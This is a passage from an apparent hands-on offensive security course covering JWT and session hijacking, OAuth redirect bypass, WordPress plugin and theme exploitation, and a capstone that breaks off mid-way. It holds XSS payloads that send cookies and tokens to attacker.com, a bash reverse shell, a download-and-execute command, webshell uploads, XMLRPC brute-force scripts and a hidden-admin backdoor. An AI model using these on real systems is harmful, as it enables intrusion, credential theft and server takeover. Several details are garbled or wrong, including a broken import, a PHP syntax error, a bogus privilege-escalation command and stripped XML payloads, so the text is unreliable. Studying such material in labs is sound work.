HTTP/1.1\nAuthorization: Bearer eyJhbGciOiJSUzI1NiJ9...\n\u2192 200 OK, admin panel\n```\n\n### JWT Session Hijacking\n\n**Attack:** Steal JWT via XSS.\n```javascript\n// Injected via XSS\ndocument.location = \"http://attacker.com/?c=\" + document.cookie;\n```\n\n**If HttpOnly is set:** Cookies with HttpOnly can't be read by JS. But JWT might be stored in localStorage:\n```javascript\n// Attacker page\nfetch('http://attacker.com/steal?token=' + localStorage.getItem('jwt'))\n```\n\n**Prevention:**\n- Store JWT in HttpOnly cookie\n- Implement short expiration (15 min)\n- Implement refresh token rotation\n- Validate `jti` (JWT ID) to prevent replay\n\n---\n\n## Lesson 29: Session Management Attacks\n\n### Session Fixation vs Session Hijacking\n\n**Session Fixation:** Attacker sets/prevents the session ID before victim logs in.\n**Session Hijacking:** Attacker steals an existing valid session ID.\n\n### Session Hijacking Techniques\n\n**1. XSS (most common):**\n```javascript\nnew Image().src = \"http://attacker.com/log?c=\" + document.cookie;\n```\n\n**2. Network Sniffing (unencrypted WiFi):**\n```bash\n# ARP spoof + wireshark\nettercap -T -M ARP -i eth0 /router// /target//\n```\n\n**3. Referer header leakage:**\n```\nGET /private HTTP/1.1\nReferer: http://target.com/private?session=abc123\n```\nIf target links to external site, session ID leaks via Referer.\n\n**4. URL parameter leakage:**\n```\nhttp://target.com/dashboard?session=abc123\n```\nIf shared, logged, or cached, session ID is exposed.\n\n**5. Cross-Site Scripting (XSS) on related domain:**\n```\nblog.target.com has XSS\nAttacker steals session cookie from main app\n```\n\n### Session Token Patterns\n\n**Weak tokens:**\n```\n# Sequential\nsession=1000\nsession=1001\n\n# Time-based predictable\nsession=1640995200 # Unix timestamp\n\n# User info encoded (no signature)\nsession=base64(\"user_id=1&role=admin\")\n```\n\n**Strong tokens:**\n```\nsession=abc123def456... # 256-bit random\n# Cryptographically random, non-guessable\n```\n\n### Clickjacking\n\n**Attack:** Invisible iframe overlaid on button.\n```html\n\nClick to win!\n```\n\nVictim clicks \"win\" button but actually clicks transfer button.\n\n**Protection:**\n```\nX-Frame-Options: DENY # or SAMEORIGIN\nContent-Security-Policy: frame-ancestors 'none'\n```\n\n### Real-World: Facebook Session Hijacking\n\n**CVE-2011-0447:**\n- Facebook used MD5 of timestamp + secret for session tokens\n- Predictable \u2192 Session hijacking possible\n- Fixed by switching to cryptographically random tokens\n\n---\n\n## Lesson 30: OAuth 2.0 Vulnerabilities\n\n### OAuth 2.0 Flow\n\n**Authorization Code Grant (the safe one):**\n```\n1. User clicks \"Login with Google\"\n2. Redirect to Google: https://google.com/oauth/authorize?client_id=...&redirect_uri=...&scope=email\n3. User approves\n4. Google redirects back: https://app.com/callback?code=ABC123\n5. App exchanges code for token: POST to Google token endpoint\n6. Google returns access_token + refresh_token\n7. App uses access_token to fetch user info\n```\n\n### OAuth Vulnerabilities\n\n**1. Redirect URI Validation:**\n```python\n# VULNERABLE: Only checks if contains expected domain\nif \"target.com\" in redirect_uri:\n # approve\n```\nBypass: `http://target.com.evil.com`\n\n**2. State Parameter Not Used:**\nWithout `state` parameter, CSRF is possible.\n```\n1. Attacker initiates OAuth flow, gets auth URL\n2. Tricks victim into clicking auth URL\n3. Victim authenticates, redirected to attacker's callback\n4. Attacker gets auth code, exchanges for token\n```\n\n**3. Scope Escalation:**\n```\n# User approves: read email only\n# But attacker modifies scope to: read email + publish posts\n```\n\n**4. Token Leakage via Referer:**\n```\n# If redirect_uri is on HTTPS but links to HTTP\n# Referer header leaks token\n```\n\n### OAuth Lab: PortSwigger\n\n**Lab:** OAuth account hijotiation via redirect URI bypass.\n\n**Step 1: Analyze the OAuth flow**\nVisit `/auth?client_id=...&redirect_uri=...`\n\n**Step 2: Test redirect_uri validation**\n```\nGET /auth?client_id=abc&redirect_uri=http://evil.com\n\u2192 Rejected\n\nGET /auth?client_id=abc&redirect_uri=http://target.com.evil.com\n\u2192 Redirects to evil.com\n```\n\n**Step 3: Extract code**\n```\n1. Attacker initiates OAuth flow\n2. Victim clicks attacker's link: /auth?client_id=abc&redirect_uri=http://target.com.evil.com\n3. Victim authenticates\n4. Redirects to http://target.com.evil.com/callback?code=ABC123\n5. Attacker captures code\n```\n\n**Step 4: Exchange code**\n```python\nimport requests\nr = requests.post(\"https://target.com/oauth/token\",\n data={\"code\": \"ABC123\", \"client_id\": \"abc\"})\n# Returns access_token\n```\n\n**Step 5: Use token**\n```python\nr = requests.get(\"https://api.target.com/user\",\n headers={\"Authorization\": f\"Bearer {access_token}\"})\n# Returns victim's account data\n```\n\n---\n\n## Exercise 11: JWT Algorithm None Bypass\n\n**Objective:** Bypass JWT authentication by setting algorithm to none.\n\n**Lab:** PortSwigger \"JWT authentication bypass via algorithm none\"\n\n**Steps:**\n1. Login as `wiener:peter`, intercept the JWT\n2. Decode the JWT:\n```\neyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6IndpZW5lciIsInJvbGUiOiJ1c2VyIn0.abc123signature\n```\n\n3. In Burp Decoder, modify the payload:\n```\n{\"user_id\":1,\"username\":\"wiener\",\"role\":\"admin\"}\n```\n\n4. In Burp Repeater, modify the header:\n```\n{\"alg\":\"none\",\"typ\":\"JWT\"}\n```\n\n5. Send request with modified token:\n```\nGET /admin HTTP/1.1\nAuthorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6IndpZW5lciIsInJvbGUiOiJhZG1pbiJ9.\n```\n\n6. If successful, admin panel is accessible.\n\n\n\nSolution\n\n**Using jwt_tool.py:**\n```bash\npython3 jwt_tool.py -I -A none -pc \"user_id:1,username:wiener,role:admin\" -pr \"\" eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6IndpZW5lciIsInJvbGUiOiJ1c2VyIn0.abc123signature\n```\n\n**Manual approach in Burp:**\n1. Decode JWT from Base64\n2. Change role from \"user\" to \"admin\"\n3. Change alg from \"HS256\" to \"none\"\n4. Remove signature (third part should be empty or omitted)\n5. Encode header and payload again\n6. Send with no signature part (trailing dot required)\n\n**Python script:**\n```python\nimport base64\nimport json\n\ndef b64url_encode(data):\n return base64.urlsafe_b64encode(data).rstrip(b'=').decode()\n\nheader = {\"alg\": \"none\", \"typ\": \"JWT\"}\npayload = {\"user_id\": 1, \"username\": \"wiener\", \"role\": \"admin\"}\n\ntoken = b64url_encode(json.dumps(header).encode()) + \".\" + b64url_encode(json.dumps(payload).encode()) + \".\"\nprint(token)\n```\n\n\n\n---\n\n## Exercise 12: Session Hijacking via XSS\n\n**Objective:** Steal admin session cookie via stored XSS, then use it to access admin panel.\n\n**Lab:** PortSwigger \"Stored XSS with CSP bypass\"\n\n**Steps:**\n1. Find a stored XSS in the blog comment section\n2. Inject payload to steal cookie:\n```html\n\nfetch('http://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));\n\n```\n\n3. Set up netcat listener on attacker box:\n```bash\nnc -lvnp 8080\n```\n\n4. Wait for admin to view the blog (admin visits the page to moderate comments)\n\n5. Capture the cookie:\n```\nGET /steal?cookie=session=abc123admin HTTP/1.1\nHost: attacker.com\n```\n\n6. Use the stolen cookie in Burp:\n```\nGET /admin HTTP/1.1\nCookie: session=abc123admin\n```\n\n7. Access admin panel.\n\n\n\nSolution\n\n**Step 1: Find XSS in comment field**\n- Post comment with `alert(1)`\n- Confirm it executes on page load\n\n**Step 2: Set up exfiltration**\n```bash\n# On attacker\nnc -lvnp 8080\n```\n\n**Step 3: Inject cookie stealer**\n```html\n\nnew Image().src=\"http://attacker.com:8080/\"+document.cookie;\n\n```\n\n**Step 4: Wait for admin**\n- Admin visits page to approve/reject comments\n- XSS fires, sends cookie to attacker\n\n**Step 5: Use cookie**\n```bash\n# In Burp, intercept any request\n# Replace Cookie header with stolen cookie\n# Forward \u2192 authenticated as admin\n```\n\n**Step 6: Full account takeover**\n- Change admin password\n- Add new admin account\n- Extract user data\n\n\n\n---\n\n## Summary Table\n\n| Lesson | Topic | Key Technique | Impact |\n|--------|-------|--------------|--------|\n| 26 | Auth Fundamentals | 3 factors, session vs token | Understanding base |\n| 27 | Broken Auth | Brute force, reset flaws | Account takeover |\n| 28 | JWT Attacks | None algorithm, key confusion | Privilege escalation |\n| 29 | Session Management | Fixation, hijacking, clickjacking | Session theft |\n| 30 | OAuth Vulnerabilities | URI bypass, state CSRF | Account linking hijack |\n\n---\n\n## Quick Reference: JWT Attack Cheat Sheet\n\n| Attack | Payload | Fix |\n|--------|---------|-----|\n| Algorithm none | `{\"alg\":\"none\"}` | Verify signature always |\n| Key confusion | Use RS256 public key as HS256 secret | Use correct algorithm per key type |\n| Weak secret | Crack with wordlist | Strong random secret |\n| kid injection | `{\"kid\":\"../../etc/passwd\"}` | Sanitize kid, use jku |\n| jku injection | `{\"jku\":\"http://evil.com/jwk\"}` | Whitelist jku URLs |\n| kty omission | `{\"kty\":\"oct\"}` without alg | Validate kty matches alg |\n\n---\n\n**Next Module:** WordPress Exploitation \u2014 the most common CMS in the world. We'll cover plugin vulnerabilities, theme exploits, authentication bypass, and real-world CTF examples.\n\n\n\n\n# Module 7: WordPress Exploitation \u2014 Plugins, Themes, Authentication\n\n## Lesson 31: WordPress Architecture\n\n### Why WordPress?\n\nWordPress powers 43%+ of all websites. Large attack surface. Many plugins, many vulnerabilities.\n\n**Statistics:**\n- 60,000+ plugins in repository\n- 10,000+ themes\n- Custom plugin/theme development common\n- Many sites never update\n\n**Attack surface:**\n- Core WordPress vulnerabilities (rare but critical)\n- Plugin vulnerabilities (most common)\n- Theme vulnerabilities\n- Configuration issues\n- Authentication flaws\n\n### WordPress Directory Structure\n\n```\n/var/www/html/ (or /var/www/wordpress/)\n\u251c\u2500\u2500 wp-admin/ # Admin panel\n\u251c\u2500\u2500 wp-content/\n\u2502 \u251c\u2500\u2500 plugins/ # Your plugins\n\u2502 \u251c\u2500\u2500 themes/ # Your themes\n\u2502 \u251c\u2500\u2500 uploads/ # User uploads\n\u2502 \u2514\u2500\u2500 cache/ # Cache\n\u251c\u2500\u2500 wp-includes/ # WordPress core\n\u251c\u2500\u2500 wp-config.php # Database credentials\n\u251c\u2500\u2500 .htaccess # Apache config\n\u2514\u2500\u2500 wp-login.php # Login page\n```\n\n### Key Files\n\n**wp-config.php:**\n```php\ndefine('DB_NAME', 'wordpress');\ndefine('DB_USER', 'wp_user');\ndefine('DB_PASSWORD', 'SecurePassword123!');\ndefine('DB_HOST', 'localhost');\ndefine('AUTH_KEY', 'put your unique phrase here');\n```\n\n**wp-content/uploads:**\n```\n/var/www/html/wp-content/uploads/2026/06/\n```\nUser uploads go here. Usually NOT executable. But sometimes misconfigured.\n\n### WordPress REST API\n\n**Endpoints:**\n```\nGET /wp-json/wp/v2/posts\nGET /wp-json/wp/v2/users\nPOST /wp-json/wp/v2/posts\n```\n\n**User enumeration:**\n```\nGET /wp-json/wp/v2/users\n\u2192 [ {\"id\": 1, \"name\": \"admin\", \"slug\": \"admin\"} ]\n```\n\nIf REST API user enumeration is disabled, enumerate via author archive:\n```bash\nfor i in {1..20}; do\n curl -s -o /dev/null -w \"%{http_code}\" \"http://target.com/?author=$i\"\n echo \" author=$i\"\ndone\n```\n\n### WordPress Security Mechanisms\n\n**Nonce tokens:**\n```php\n// In forms\nwp_nonce_field('delete-comment_123');\n\n// Verify in handler\nif (!wp_verify_nonce($_POST['_wpnonce'], 'delete-comment_123')) {\n die('Security check failed');\n}\n```\n\n**CSRF protection:** Nonces + SameSite cookies.\n\n**File upload:** MIME type check, no PHP execution in uploads by default.\n\n---\n\n## Lesson 32: WordPress Enumeration\n\n### Discovery\n\n**Is it WordPress?**\n```bash\n# Check for WordPress-specific files\ncurl -s http://target.com/wp-login.php | grep -i wordpress\ncurl -s http://target.com/readme.html | head -20\ncurl -s http://target.com/wp-content/uploads/ | head -20\n\n# Meta generator tag\ncurl -s http://target.com | grep 'WordPress'\n```\n\n**Version detection:**\n```bash\n# Via meta tag\ncurl -s http://target.com | grep 'version'\n\n# Via generator tag\n\n\n# Via RSS\ncurl -s http://target.com/feed/ | grep 'generator'\n\n# Via wp-includes/version.php\ncurl -s http://target.com/wp-includes/version.php | grep 'wp_version'\n```\n\n### wpscan \u2014 The WordPress Scanner\n\n```bash\n# Basic scan\nwpscan --url http://target.com\n\n# With API token (better results)\nwpscan --url http://target.com --api-token YOUR_API_TOKEN\n\n# Enumerate users\nwpscan --url http://target.com --enumerate u\n\n# Enumerate plugins\nwpscan --url http://target.com --enumerate p\n\n# Enumerate themes\nwpscan --url http://target.com --enumerate t\n\n# Aggressive plugin detection\nwpscan --url http://target.com --enumerate p --plugins-detection aggressive\n\n# Password brute force\nwpscan --url http://target.com --passwords /usr/share/wordlists/rockyou.txt --usernames admin\n```\n\n### Plugin Enumeration\n\n**Via wpscan:**\n```bash\nwpscan --url http://target.com --enumerate p\n```\n\n**Via API (for known vulnerabilities):**\n```\nhttps://wpscan.com/plugin/{plugin_name}\n```\n\n**Common vulnerable plugins:**\n| Plugin | Vulnerability | Severity |\n|--------|--------------|----------|\n| revslider | File upload RCE | Critical |\n| gravityforms | SQL injection | Critical |\n| wordpress-seo | XSS | High |\n| contact-form-7 | File upload | High |\n| upty | Authentication bypass | Critical |\n| duplicator | File disclosure | High |\n| filemanager | Arbitrary file read | Critical |\n\n### Theme Enumeration\n\n```bash\nwpscan --url http://target.com --enumerate t\n```\n\n**Look for:**\n- Outdated themes\n- Custom themes with vulnerabilities\n- Theme-specific vulnerabilities\n\n### User Enumeration\n\n**Via REST API:**\n```bash\ncurl -s http://target.com/wp-json/wp/v2/users\n```\n\n**Via author archive:**\n```bash\nfor i in {1..30}; do\n code=$(curl -s -o /dev/null -w \"%{http_code}\" \"http://target.com/?author=$i\")\n if [ \"$code\" == \"200\" ]; then\n echo \"User ID: $i\"\n fi\ndone\n```\n\n**Via login page:**\n```bash\ncurl -s \"http://target.com/wp-login.php\" | grep 'user_login'\n```\n\n---\n\n## Lesson 33: WordPress Authentication Attacks\n\n### Login Page Attacks\n\n**wp-login.php:**\n```\nhttp://target.com/wp-login.php\nhttp://target.com/wp-admin/\n```\n\n**Username enumeration via error messages:**\n```\n# Wrong password\n\"ERROR: The password you entered for the username admin is incorrect.\"\n\n# Wrong username\n\"ERROR: Invalid username.\"\n```\n\nIf you get \"Invalid username\" \u2192 that username doesn't exist.\n\n**Brute force protection:**\n- Many plugins: Limit Login Attempts, Wordfence\n- IP-based lockout\n- 2FA plugins\n\n**Bypass:**\n```bash\n# Use proxy with different IPs\n# Or: if lockout is per username, rotate usernames\n```\n\n### XMLRPC Attacks\n\n**What is XMLRPC?**\nWordPress's API alternative to REST API. Handles pingbacks, metaWeblog, blogger APIs.\n\n**Enabled by default.** Access at:\n```\nhttp://target.com/xmlrpc.php\n```\n\n**System.multicall \u2014 Brute force via XMLRPC:**\n```xml\n\n\n system.multicall\n \n \n \n \n \n \n \n \n methodName\n wp.getUsers\n \n \n params\n 1\n \n \n \n \n \n \n \n \n\n```\n\n**Brute force without lockout:**\n```python\nimport requests\nimport xmlrpc.etree.ElementTree as ET\n\ntarget = \"http://target.com/xmlrpc.php\"\n\ndef try_login(username, password):\n payload = f\"\"\"\n \n wp.getUsers\n \n \n {username}\n {password}\n \n \"\"\"\n r = requests.post(target, data=payload)\n return \"faultCode\" not in r.text\n\n# Test credentials\nprint(try_login(\"admin\", \"password123\"))\n```\n\n**Pingback DDoS:**\n```xml\n\n\n pingback.ping\n \n http://target.com\n http://victim.com/\n \n\n```\n\n### WP-CLI Exploitation\n\n**If you have shell access to the server:**\n```bash\n# List users\nwp user list --path=/var/www/html\n\n# Reset password\nwp user update admin --pass=NewPassword123 --path=/var/www/html\n\n# Activate plugin\nwp plugin activate all-in-one-seo-pack --path=/var/www/html\n\n# Execute PHP\nwp eval 'echo \"test\";' --path=/var/www/html\n```\n\n---\n\n## Lesson 34: WordPress Plugin Exploitation\n\n### Plugin Vulnerabilities\n\n**Unauthenticated access to plugin functions:**\nMany plugins register REST endpoints or admin-ajax.php handlers without proper capability checks.\n\n**Example: Plugin registers admin action without nonce check:**\n```php\nadd_action('wp_ajax_save_plugin_settings', 'save_settings');\n// No capability check, no nonce check\n// If logged in as subscriber, can still access\n```\n\n### File Manager Plugin RCE (CVE-2020-25213)\n\n**Plugin:** File Manager (wp-file-manager)\n**Vulnerability:** Unauthenticated arbitrary file read/upload\n**Versions:** < 1.3\n\n**Find it:**\n```\nGET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\n```\n\n**Exploitation:**\n```bash\n# Read files\ncurl \"http://target.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=ls&target=/var/www/html/\"\n\n# Upload shell\ncurl -F \"files[]=@shell.php\" \"http://target.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\n```\n\n### Duplicator Plugin (CVE-2020-11738)\n\n**Plugin:** Duplicator\n**Vulnerability:** Directory traversal, arbitrary file read\n**Versions:** < 1.3.24\n\n**Exploitation:**\n```\nGET /wp-content/plugins/duplicator/installer/installer.php?get=1&file=../../wp-config.php\n```\n\nDownloads the backup including database credentials.\n\n### Elementor Plugin RCE (CVE-2021-1294)\n\n**Plugin:** Elementor\n**Vulnerability:** Authenticated RCE via post meta\n**Versions:** < 3.1.4\n\n**Requires:** Contributor+ account\n\n**Exploitation:**\n1. Edit a post as contributor\n2. Add custom CSS with PHP payload (via Elementor's custom code feature)\n3. Trigger the payload\n\n### Gravity Forms Unvalidated File Upload\n\n**Plugin:** Gravity Forms\n**Vulnerability:** Unauthenticated file upload\n**Versions:** < 2.4\n\n**Exploitation:**\n```bash\n# Upload PHP shell as file\ncurl -F \"file=@shell.php\" -F \"form_id=1\" \"http://target.com/wp-content/plugins/gravityforms/upload.php\"\n```\n\n### Plugin Exploitation Workflow\n\n```bash\n# 1. Enumerate plugins\nwpscan --url http://target.com --enumerate p --plugins-detection aggressive\n\n# 2. Check each for known vulnerabilities\n# https://wpscan.com/plugin/{plugin_name}\n\n# 3. If unauthenticated RCE found:\n# Upload shell via the vulnerability\n\n# 4. If authenticated (subscriber+):\n# Find author/contributor account\n# Brute force credentials\n# Use stored XSS + CSRF chain\n```\n\n---\n\n## Lesson 35: WordPress Theme Exploitation\n\n### Theme Vulnerabilities\n\n**1. functions.php backdoors:**\n```php\n// Hidden admin account\nadd_action('wp_head', 'create_admin');\nfunction create_admin() {\n if (!username_exists('backupadmin')) {\n $id = wp_create_user('backupadmin', 'BackupPass123!', 'admin@backup.com');\n $role = get_role('administrator');\n add_role('backup_admin', 'Backup Admin', $capabilities);\n }\n}\n```\n\n**2. Theme-specific file upload:**\n```php\n// Customizer logo upload without validation\n// If checked via MIME type only \u2192 bypass\n```\n\n**3. Theme options injection:**\n```php\n// If theme saves options to database unsafely\nupdate_option('theme_custom_css', $_POST['custom_css']);\n// XSS in custom_css field\n```\n\n### Stored XSS via Theme Customizer\n\n**Scenario:** Theme allows custom CSS/JavaScript in customizer.\n\n**Attack:**\n1. Go to Appearance \u2192 Customize \u2192 Additional CSS\n2. Inject:\n```css\nbody { background: url('http://attacker.com/xss.gif'); }\n```\nXSS via CSS is limited, but stored.\n\n**Better \u2014 via custom JavaScript:**\nIf theme has \"Custom JavaScript\" field:\n```javascript\n\nfetch('http://attacker.com/steal?cookie=' + document.cookie);\n\n```\n\n### Theme File Inclusion\n\n**If theme uses include() with user input:**\n```php\n// Dangerous\n$theme_page = $_GET['page');\ninclude(get_template_directory() . '/pages/' . $theme_page . '.php');\n```\n\n**Access:**\n```\nGET /wp-content/themes/vulnerable-theme/page.php?page=../../wp-config\n```\n\n### Real-World: ThemeRex Theme RCE\n\n**Theme:** ThemeRex\n**Vulnerability:** Authenticated (author+) arbitrary file upload\n**Exploitation:**\n1. Create post as author\n2. Upload malicious theme file via customizer\n3. Activate theme\n4. RCE via functions.php\n\n---\n\n## Exercise 13: WordPress Brute Force via XMLRPC\n\n**Objective:** Use XMLRPC system.multicall to brute force WordPress login without triggering lockout.\n\n**Lab:** Any WordPress installation with valid credentials.\n\n**Setup:**\n```bash\n# Install WordPress on DVWA or use PortSwigger lab\n# Credentials: admin / password\n```\n\n**Steps:**\n1. Test XMLRPC is enabled:\n```bash\ncurl -s -X POST \"http://target.com/xmlrpc.php\" -d 'system.listMethods'\n```\n\n2. Should return list of methods including `wp.getUsers`, `wp.login`.\n\n3. Create wordlist:\n```\npassword\nadmin\npassword123\nadmin123\nqwerty\nletmein\n```\n\n4. Write Python script:\n```python\nimport requests\n\ntarget = \"http://target.com/xmlrpc.php\"\nusers = [\"admin\", \"administrator\", \"root\"]\npasswords = [\"password\", \"admin\", \"password123\", \"admin123\", \"qwerty\", \"letmein\"]\n\nfor user in users:\n for password in passwords:\n payload = f\"\"\"\n \n wp.login\n \n {user}\n {password}\n \n \"\"\"\n r = requests.post(target, data=payload)\n if \"faultCode\" not in r.text:\n print(f\"SUCCESS: {user}:{password}\")\n exit()\n```\n\n5. Run script \u2192 finds admin:password\n\n6. Login to wp-admin with found credentials.\n\n\n\nSolution\n\n**Why this works:**\n- Traditional wp-login.php brute force triggers lockout after 3-5 attempts\n- XMLRPC `wp.login` doesn't always trigger the same lockout\n- system.multicall allows batching multiple login attempts in one request\n\n**Full multicall approach (faster):**\n```python\nimport requests\n\ntarget = \"http://target.com/xmlrpc.php\"\npayload = \"\"\"\n\n system.multicall\n \n \n \n \n \n \n \n \n methodName\n wp.login\n \n \n params\n \n \n \n admin\n password\n \n \n \n \n \n \n \n \n \n \n \n\"\"\"\n\nr = requests.post(target, data=payload)\nprint(r.text)\n```\n\n**Note:** WordPress 4.4+ added rate limiting to XMLRPC. But some hosts don't enforce it properly.\n\n\n\n---\n\n## Exercise 14: Exploit File Manager Plugin RCE\n\n**Objective:** Exploit the File Manager plugin to upload a webshell and gain RCE.\n\n**Lab:** PortSwigger \"WordPress Compromised Plugin RCE\"\n\n**Steps:**\n1. Enumerate plugins:\n```bash\nwpscan --url http://target.com --enumerate p\n```\n\n2. Find file-manager plugin \u2192 version < 1.3\n\n3. Test vulnerability:\n```bash\ncurl -s \"http://target.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\n```\n\n4. If accessible, test file read:\n```bash\ncurl \"http://target.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=id&target=NONE\"\n```\n\n5. Upload webshell:\n```bash\n# Create shell\necho '' > shell.php\n\n# Upload via connector\ncurl -F \"files[]=@shell.php\" \\\n \"http://target.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\n```\n\n6. Find uploaded shell:\n```bash\ncurl \"http://target.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=ls&target=/var/www/html/wp-content/plugins/wp-file-manager/lib/files/\"\n```\n\n7. Execute commands:\n```bash\ncurl \"http://target.com/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=whoami\"\n```\n\n8. Get reverse shell:\n```bash\ncurl \"http://target.com/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=bash+-i+>%26+/dev/tcp/attacker.com/4444+0>%261\"\n```\n\n\n\nSolution\n\n**Full exploitation chain:**\n\n1. **Discovery:**\n```bash\ncurl -s \"http://target.com/wp-content/plugins/wp-file-manager/\" | grep -i file-manager\n```\n\n2. **Version check:**\n```bash\ncurl -s \"http://target.com/wp-content/plugins/wp-file-manager/readme.txt\" | head -20\n```\n\n3. **Webshell upload:**\n```bash\n# Create a slightly obfuscated shell\ncat > shell.php << 'EOF'\n\"; system($_REQUEST['cmd']); echo \"\";\n}\n?>\nEOF\n\ncurl -X POST \\\n -F \"files[]=@shell.php\" \\\n \"http://target.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\n```\n\n4. **Verify upload:**\n```bash\ncurl -s \"http://target.com/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=id\"\n```\n\n5. **Upgrade to meterpreter:**\n```bash\n# In shell\ncurl http://attacker.com:8080/shell.elf -o /tmp/shell.elf && chmod +x /tmp/shell.elf && /tmp/shell.elf\n```\n\n\n\n---\n\n## Summary Table\n\n| Lesson | Topic | Key Technique | Impact |\n|--------|-------|--------------|--------|\n| 31 | WP Architecture | Directory structure, REST API | Understanding surface |\n| 32 | WP Enumeration | wpscan, user enum, plugin enum | Map the target |\n| 33 | WP Auth Attacks | XMLRPC brute force, pingback | Account takeover |\n| 34 | Plugin Exploitation | RCE via plugin vulnerabilities | Server compromise |\n| 35 | Theme Exploitation | Backdoors, customizer XSS | Persistence, XSS |\n\n---\n\n## Quick Reference: WordPress Attack Cheat Sheet\n\n| Attack | Command | Tool |\n|--------|---------|------|\n| User enum | `curl /wp-json/wp/v2/users` | Manual |\n| Version | `curl /wp-includes/version.php` | Manual |\n| Plugin scan | `wpscan --url target --enumerate p` | wpscan |\n| Theme scan | `wpscan --url target --enumerate t` | wpscan |\n| XMLRPC brute | POST to xmlrpc.php with wp.login | Python |\n| Plugin RCE | Upload via vulnerable endpoint | curl + manual |\n| Theme backdoor | grep for create_user in functions.php | grep |\n\n---\n\n**Next Module:** Capstone CTF Walkthroughs \u2014 We'll walk through two full attack chains: a bug bounty writeup and a HackTheBox web challenge. Real targets, real exploits.\n\n\n\n\n# Module 8: Capstone CTF Walkthroughs \u2014 Bug Bounty + HackTheBox\n\n## Lesson 36: Capstone 1 \u2014 WordPress + File Manager RCE to Domain Admin\n\n### Scenario\n\n**Target:** `http://target-corp.com` \u2014 A WordPress corporate site\n**Goal:** Compromise the web server, then pivot to Active Directory domain admin\n**Time to complete:** 2-4 hours\n**Tools needed:** Burp Suite, wpscan, nmap, Metasploit, PowerShell\n\n### Phase 1: Reconnaissance\n\n**Step 1: Port scan**\n```bash\nnmap -p 22,80,443,3306,8080,8443 -sV -oA target_scan target-corp.com\n```\n\n**Results:**\n```\n22/tcp open ssh OpenSSH 7.4\n80/tcp open http Apache 2.4.6\n443/tcp open ssl/http Apache 2.4.6\n3306/tcp open mysql MySQL 5.7.32\n8080/tcp open http Apache 2.4.6 (proxy)\n```\n\n**Step 2: WordPress discovery**\n```bash\ncurl -s http://target-corp.com | grep -i 'WordPress'\n# \n\ncurl -s http://target-corp.com/readme.html | head -10\n# Version 6.2.2\n```\n\n**Step 3: wpscan**\n```bash\nwpscan --url http://target-corp.com --enumerate u,p,t --api-token YOUR_TOKEN\n```\n\n**Findings:**\n- WordPress 6.2.2\n- User: `admin` (enumerated via /wp-json/wp/v2/users)\n- Plugins: `wp-file-manager` version 1.2 (VULNERABLE \u2014 CVE-2020-25213)\n- Theme: twentytwentythree\n\n### Phase 2: Initial Access via File Manager\n\n**Step 1: Verify File Manager vulnerability**\n```bash\ncurl -s \"http://target-corp.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\n# Returns JSON \u2014 endpoint is accessible\n```\n\n**Step 2: Test command execution**\n```bash\ncurl -s \"http://target-corp.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=id&target=NONE\"\n# Response: {\"error\":\"no such file or directory\"}\n# But we see it's processing cmd parameter\n```\n\n**Step 3: Create and upload webshell**\n```bash\ncat > shell.php << 'EOF'\n\".shell_exec($_REQUEST['cmd']).\"\";\n}\n?>\nEOF\n\ncurl -X POST \\\n -F \"files[]=@shell.php\" \\\n \"http://target-corp.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\n```\n\n**Step 4: Verify shell**\n```bash\ncurl -s \"http://target-corp.com/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=id\"\n# uid=48(apache) gid=48(apache) groups=48(apache)\n```\n\n**RCE confirmed \u2014 we have a low-privilege Apache user.**\n\n### Phase 3: Privilege Escalation\n\n**Step 1: Enumerate the system**\n```bash\ncurl -s \"http://target-corp.com/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=cat+/etc/passwd\"\ncurl -s \"http://target-corp.com/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=uname+-a\"\ncurl -s \"http://target-corp.com/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=whoami\"\n```\n\n**System info:**\n- CentOS 7\n- Kernel 3.10.0-1160.el7.x86_64\n- Apache 2.4.6\n- Running as `apache` user\n\n**Step 2: Check for SUID binaries**\n```bash\ncurl -s \"http://target-corp.com/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=find+/+-perm+-4000+-type+f+2>/dev/null\"\n```\n\n**Findings:**\n- `/usr/bin/sudo` (misconfigured)\n- `/usr/bin/systemctl` (potential GTFO bins)\n\n**Step 3: Check sudo permissions**\n```bash\ncurl -s \"http://target-corp.com/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=sudo+-l\"\n# User apache may run the following commands on localhost:\n# (ALL) NOPASSWD: /usr/bin/systemctl\n```\n\n**Step 4: GTFO bins privilege escalation**\n```bash\ncurl -s \"http://target-corp.com/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=sudo+systemctl+status+httpd\"\n# Works \u2014 we can run systemctl as root\n```\n\n**Step 5: Get root shell**\n```bash\ncurl -s \"http://target-corp.com/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=sudo+systemctl+exec.start+'+/bin/bash+-c+/bin/bash+-i'\"\n```\n\n**We are root.**\n\n### Phase 4: Database Access\n\n**Step 1: Find wp-config.php**\n```bash\ncurl -s \"http://target-corp.com/wp-content/plugins/wp-file-manager/lib/files/shell.php?cmd=cat+/var/www/html/wp-config.php\"\n```\n\n**Credentials:**\n```php\ndefine('DB_NAME', 'wordpress');\ndefine('DB_USER', 